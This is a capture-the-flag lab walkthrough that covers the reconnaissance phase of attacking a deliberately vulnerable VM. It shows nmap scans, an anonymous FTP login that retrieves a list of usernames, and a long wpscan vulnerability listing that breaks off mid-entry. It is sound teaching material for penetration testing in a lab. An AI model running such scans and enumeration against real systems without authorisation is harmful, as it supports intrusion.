#HackOnTuesday Episode 9: How to hack the Bsides Vancouver 2018 CTF VM (Part 1)

Hello everyone and welcome back to another episode of the #HackOnTuesday video series. Today, we will take a look at the vulnerable VM released by Mohamed Shahat (@abatchy17, https://twitter.com/@abatchy17) at the BSides Vancouver 2018.

This VM can be downloaded from VulnHub.com. (https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/).

Going through the description provided by Mohamed, we don’t get any hints about the VM or the challenges. So, let’s fire up VirtualBox and take a closer look at the BSides Vancouver 2018 vulnerable VM.

The login prompt doesn’t contain any hints, which means we will need to collect information about the target the old way: with netdiscover, nmap, and the rest of our favorite tools.

 So, let’s fire up our Kali machine and look for the vulnerable VM’s IP.
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.10.4 netmask 255.255.255.0 broadcast 192.168.10.255
inet6 fe80::a00:27ff:fe54:5f84 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:54:5f:84 txqueuelen 1000 (Ethernet)
RX packets 47 bytes 6764 (6.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 2364 (2.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 40 bytes 2720 (2.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 40 bytes 2720 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Our IP address in this case is 192.168.10.4 and because of the fact that I am attached to the VirtualBox’s “host-only adapter” like the vulnerable VM, the IP of the vulnerable VM is very likely in the same subnet.

To find the vulnerable VM’s IP address, we can use a multitude of tools. Here is how you can do it with the nmap tool.
root@kali:~/pentest# nmap -sn 192.168.10.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 03:36 PST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.10.1
Host is up (0.00018s latency).
MAC Address: 0A:00:27:00:00:19 (Unknown)
Nmap scan report for 192.168.10.2
Host is up (0.00023s latency).
MAC Address: 08:00:27:62:DD:50 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.4
Host is up (0.00024s latency).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.10.3
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.96 seconds

As we can see from the nmap’s output, there are only two machines with a VirtualBox virtual NIC: the machine 192.168.10.3 and the machine 192.168.10.4. Since our IP is 192.168.10.4, the IP address of the vulnerable machine is 192.168.10.3.

With the IP address of the vulnerable VM, the next step is to identify the open ports on that machine. Once again, nmap is a great tool to do that.

For this test, we can take advantage of the -A option, although in a real environment we would probably not enable OS detection, version detection, script scanning, and traceroute all at once, because it will attract to much attention.

root@kali:~# nmap -Pn -n -A 192.168.10.3 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 05:17 PST
Nmap scan report for 192.168.10.3
Host is up (0.00064s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.10.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds

Well well well, there is a lot of interesting and juicy information in the nmap’s output. First of all, the vulnerable VM seems to have 3 open ports: 21, 22, and 80, where a vsftpd, and OpenSSH, and an Apache server are running.

At first sight the software versions don’t seem to have known remote exploits, but there seem to be a lot going on. Anonymous FTP login is allowed and the robots.txt file contains an interesting folder. So, let’s take a closer look at each finding starting from the first one: the allowed anonymous ftp login.
root@kali:~# ftp 192.168.10.3
Connected to 192.168.10.3.
220 (vsFTPd 2.3.5)
Name (192.168.10.3:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
226 Directory send OK.
ftp> cd public
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk
226 Directory send OK.

Wow! It looks like we have a potentially interesting file: the users.txt.bk (probably a backup file). Let’s download it and see what it contains.

ftp> get users.txt.bk
local: users.txt.bk remote: users.txt.bk
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for users.txt.bk (31 bytes).
226 Transfer complete.
31 bytes received in 0.00 secs (10.0409 kB/s)
ftp> quit
221 Goodbye.
root@kali:~/pentest# cat users.txt.bk
abatchy
john
mai
anne
doomguy

Not surprisingly, it contains a list of users. In particular, 5 users that probably have an account somewhere in this machine. Since there is nothing else on the public folder, we can turn our attention to the robots.txt file found by nmap found.

Apparently, there is a folder that the system administrator doesn’t want us to see: backup_wordpress. If we go there, we can see a WordPress installation. That’s great because it could be our way in.

To get an idea of its degree of security, we will use wpscan.

root@kali:~/pentest# wpscan --url 192.168.10.3/backup_wordpress --enumerate ap --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.4.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.10.3/backup_wordpress/
[+] Started: Tue Feb 19 10:43:04 2019

Interesting Finding(s):

[+] http://192.168.10.3/backup_wordpress/
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3.26
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.10.3/backup_wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.10.3/backup_wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] WordPress version 4.5 identified (Insecure, released on 2016-04-12).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.10.3/backup_wordpress/?feed=rss2, <generator>https://wordpress.org/?v=4.5</generator>
| - http://192.168.10.3/backup_wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.5</generator>
|
| [!] 51 vulnerabilities identified:
|
| [!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
| Fixed in: 4.5.2
| References:
| - https://wpvulndb.com/vulnerabilities/8488
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
| - https://wordpress.org/news/2016/05/wordpress-4-5-2/
| - https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
| - https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
|
| [!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
| Fixed in: 4.5.2
| References:
| - https://wpvulndb.com/vulnerabilities/8489
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
| - https://wordpress.org/news/2016/05/wordpress-4-5-2/
| - https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
| - https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
|
| [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8518
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
|
| [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8519
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
| - https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
|
| [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8520
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
|
| [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
| Fixed in: 4.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/8615
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
| - https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
| - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
| - http://seclists.org/fulldisclosure/2016/Sep/6
|
| [!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
| Fixed in: 4.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/8616
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
| - https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
|
| [!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
| Fixed in: 4.7.1
| References:
| - https://wpvulndb.com/vulnerabilities/8714
| - https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
| - https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
| - http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
|
| [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8716
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
| - https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8718
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
| - https://www.mehmetince.net/low-severity-wordpress/
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
|
| [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8719
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
| - https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8720
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
| - https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8721
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
| - https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8729
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
|
| [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8730
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
|
| [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8731
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
|
| [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8765
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
| - https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
| - http://seclists.org/oss-sec/2017/q1/563
|
| [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8766
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
|
| [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8768
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
| - https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
|
| [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8770
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
| - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
| - http://seclists.org/oss-sec/2017/q1/562
| - https://hackerone.com/reports/153093
|
| [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
| References:
| - https://wpvulndb.com/vulnerabilities/8807
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
| - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
| - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
| - https://core.trac.wordpress.org/ticket/25239
|
| [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8815
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
| - https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
|
| [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8816
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
|
| [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8817
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
|
| [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8818
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
| - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
|
| [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8819
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
| - https://hackerone.com/reports/203515
| - https://hackerone.com/reports/203515
|
| [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8820
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
|
| [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8905
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
|
| [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
| Fixed in: 4.7.5
| References:
| - https://wpvulndb.com/vulnerabilities/8906
| - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://wpvulndb.com/vulnerabilities/8905
|
| [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41398
|
| [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41457
|
| [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41448
|
| [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8914
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41395
| - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
|
| [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
| Fixed in: 4.5.11
| References:
| - https://wpvulndb.com/vulnerabilities/8941
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
| - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
| - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
| - https://twitter.com/ircmaxell/status/923662170092638208
| - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
|
| [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8966
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8967
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8968
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8969
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
| Fixed in: 4.5.13
| References:
| - https://wpvulndb.com/vulnerabilities/9006
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
| - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
| - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
| References:
| - https://wpvulndb.com/vulnerabilities/9021
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
| - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
| - https://github.com/quitten/doser.py
| - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
|
| [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9053
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
|
| [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9054
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
|
| [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9055
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
|
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
| Fixed in: 4.5.15
| References:
| - https://wpvulndb.com/vulnerabilities/9100
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9170
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
